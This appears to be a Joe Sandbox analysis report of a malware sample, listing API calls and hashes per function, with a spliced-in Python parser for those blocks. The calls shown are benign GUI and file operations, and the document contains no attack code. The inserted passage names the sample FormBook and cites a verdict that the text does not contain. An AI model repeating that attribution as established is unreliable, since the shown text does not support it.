                                                                                                                            • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                                                                            • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                            • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                                                                            APIs
                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                                                                                            • GetCursorInfo.USER32 ref: 00458E03
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Cursor$Load$Info
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2577412497-0
                                                                                                                            • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                            • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                                                                            • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                            • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                                                                            APIs
                                                                                                                            • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                                                                            • GetFocus.USER32 ref: 004696E0
                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost$CtrlFocus
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 1534620443-4108050209
                                                                                                                            • Opcode ID: ff00ec732dd06da7480cfd50de3633a83f3a61379b8a8b3e564d18e7af3fa5cd
                                                                                                                            • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                                                                            • Opcode Fuzzy Hash: ff00ec732dd06da7480cfd50de3633a83f3a61379b8a8b3e564d18e7af3fa5cd
                                                                                                                            • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00468107
                                                                                                                            • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00468227
                                                                                                                            • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                                                                            • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                                                                            • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                                                                            • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                                                                            • GetMenuItemCount.USER32 ref: 004682DC
                                                                                                                            • SetMenuItemInfoW.USER32 ref: 00468317
                                                                                                                            • GetCursorPos.USER32(00000000), ref: 00468322
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                                                                            • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 3993528054-4108050209
                                                                                                                            • Opcode ID: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                                                                            • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                                                                            • Opcode Fuzzy Hash: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                                                                            • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                                                                            APIs
                                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                                                                              • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                              • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                              • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                            • SendMessageW.USER32(?), ref: 0046F34C
                                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                                                                            • _wcscat.LIBCMT ref: 0046F3BC
                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                                                                            • DragFinish.SHELL32(?), ref: 0046F414
                                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                            • API String ID: 4085615965-3440237614
                                                                                                                            • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                            • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                                                                            • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                            • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
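                                                                                                                             The per-function blocks above follow a fixed layout (an "APIs" list of call lines with a "ref:" address, optional "Part of subcall function" lines, the memory-dump lines, and a "Similarity" section whose "API ID" is a frequency-ordered digest of the call names), which makes them easy to turn into structured records for triage across a whole report. The following is an added example, not Joe Sandbox code: a parser for that layout, plus a recomputation of the "API ID" under a rule inferred from the blocks on this page (CamelCase tokens, a stop-token set such as Get/Set/Dlg/W dropped, tokens bucketed by how many listed calls contain them, buckets joined by "$" from most to least frequent, alphabetical inside a bucket). The STOP_TOKENS set and that rule are assumptions that are checked only against this page; the sample input is a trimmed, de-indented copy of two of the blocks above.

```python
"""Parse Joe Sandbox per-function "APIs" blocks and recompute the Similarity
"API ID".  Added example, not Joe Sandbox code: the API ID rule and the
STOP_TOKENS set are inferred from the blocks on this page only."""
from __future__ import annotations
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import NamedTuple

# Two function blocks copied from the report above, trimmed and de-indented;
# the "Download File" link text fused onto the Associated line is kept on
# purpose so the parser has to strip it.
SAMPLE = """\
APIs
• PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
• GetFocus.USER32 ref: 004696E0
• GetDlgCtrlID.USER32(00000000), ref: 004696EB
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: MessagePost$CtrlFocus
• String ID: 0
APIs
• DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
  • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
  • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
  • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
• SendMessageW.USER32(?), ref: 0046F34C
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
• _wcscat.LIBCMT ref: 0046F3BC
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
• SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
• SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
• SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
• DragFinish.SHELL32(?), ref: 0046F414
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
Similarity
• API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
"""

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>_*[A-Za-z]\w*)\.(?P<module>[A-Z0-9_]+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
META_LINE = re.compile(r"^\s*•\s*(?P<key>[^:]+?):\s*(?P<val>.*?)\s*$")
CAMEL = re.compile(r"[A-Z]+(?![a-z])|[A-Z][a-z]+")
# Assumption: tokens present in call names on this page but never in an API ID.
STOP_TOKENS = {"Get", "Set", "Dlg", "W", "ID", "Ex", "Pos", "Pt", "In", "To", "Def"}


class Call(NamedTuple):
    name: str
    module: str
    args: str
    ref: str             # address of the call instruction
    subcall: str | None  # callee address when listed as "Part of subcall function"


@dataclass
class FunctionBlock:
    calls: list[Call] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)
    dumps: list[str] = field(default_factory=list)  # Source File + Associated dumps

    @property
    def entry(self) -> str:
        """Handle for the block: address of its first direct (non-subcall) call."""
        return next(c.ref for c in self.calls if c.subcall is None)


def parse_report(text: str) -> list[FunctionBlock]:
    blocks: list[FunctionBlock] = []
    for line in text.splitlines():
        if line.strip() == "APIs":  # every function block opens with this header
            blocks.append(FunctionBlock())
            continue
        if not blocks:
            continue
        if m := API_LINE.match(line):
            blocks[-1].calls.append(Call(m["name"], m["module"], m["args"] or "", m["ref"], m["sub"]))
        elif m := META_LINE.match(line):
            val = m["val"].removesuffix("Download File").strip()  # drop fused link text
            if m["key"] in ("Source File", "Associated"):
                blocks[-1].dumps.append(val)
            else:
                blocks[-1].meta[m["key"]] = val
    return blocks


def tokens(name: str) -> list[str]:
    """CRT names such as _wcscat stay whole; Win32 names split on CamelCase."""
    if name.startswith("_"):
        return [name]
    return [t for t in CAMEL.findall(name) if t not in STOP_TOKENS]


def api_id(block: FunctionBlock) -> str:
    counts = Counter(t for c in block.calls for t in tokens(c.name))  # subcalls count too
    buckets: dict[int, list[str]] = {}
    for tok, n in counts.items():
        buckets.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(buckets[n])) for n in sorted(buckets, reverse=True))


def api_id_mismatches(blocks: list[FunctionBlock]) -> list[str]:
    """Entries whose recomputed API ID differs from the report's; non-empty means
    the inferred rule or STOP_TOKENS does not cover that block."""
    return [b.entry for b in blocks if "API ID" in b.meta and api_id(b) != b.meta["API ID"]]


def functions_calling(blocks: list[FunctionBlock], *names: str) -> list[str]:
    """Entries of blocks that call any of the named APIs directly (subcalls excluded)."""
    return [b.entry for b in blocks
            if any(c.name in names and c.subcall is None for c in b.calls)]
```

                                                                                                                             Run api_id_mismatches() over a full report before trusting the recomputed digest on other samples: any entry it returns is a block where the inferred stop-token list is incomplete. Keeping the "String ID" alongside the call tokens is worth it here because @GUI_DRAGFILE, @GUI_DRAGID and @GUI_DROPID are AutoIt interpreter macro names, which helps separate runtime GUI plumbing from the code that actually matters for the FormBook verdict above.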
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsicoll
                                                                                                                            • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                            • API String ID: 3832890014-4202584635
                                                                                                                            • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                                            • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                                                                            • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                                            • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004669C4
                                                                                                                            • _wcsncpy.LIBCMT ref: 00466A21
                                                                                                                            • _wcsncpy.LIBCMT ref: 00466A4D
                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                            • _wcstok.LIBCMT ref: 00466A90
                                                                                                                              • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                                                                            • _wcstok.LIBCMT ref: 00466B3F
                                                                                                                            • _wcscpy.LIBCMT ref: 00466BC8
                                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                                                                            • _wcslen.LIBCMT ref: 00466D1D
                                                                                                                            • _memset.LIBCMT ref: 00466BEE
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            • _wcslen.LIBCMT ref: 00466D4B
                                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                            • String ID: X$HH
                                                                                                                            • API String ID: 3021350936-1944015008
                                                                                                                            • Opcode ID: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                                                                            • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                                                                            • Opcode Fuzzy Hash: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                                                                            • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0045F4AE
                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                                                                            • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                                                                            • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoItemMenu$Sleep_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 1504565804-4108050209
                                                                                                                            • Opcode ID: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                                                                            • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                                                                            • Opcode Fuzzy Hash: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                                                                            • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CreateDestroy
                                                                                                                            • String ID: ,$tooltips_class32
                                                                                                                            • API String ID: 1109047481-3856767331
                                                                                                                            • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                            • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                                                                            • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                            • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                                                                            APIs
                                                                                                                            • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                                                                            • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                                                                            • _wcscat.LIBCMT ref: 0045CD51
                                                                                                                            • _wcscat.LIBCMT ref: 0045CD63
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                                                                              • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                                                                            • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                                                                            • _wcscpy.LIBCMT ref: 0045CE14
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 1153243558-438819550
                                                                                                                            • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                                                            • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                                                                                            • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                                                            • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00455127
                                                                                                                            • GetMenuItemInfoW.USER32 ref: 00455146
                                                                                                                            • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                                                                                            • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                                                                                            • GetMenuItemCount.USER32(?), ref: 004551D9
                                                                                                                            • SetMenu.USER32(?,00000000), ref: 004551E7
                                                                                                                            • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                                                                                            • DrawMenuBar.USER32 ref: 00455207
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 1663942905-4108050209
                                                                                                                            • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                            • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                                                                            • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
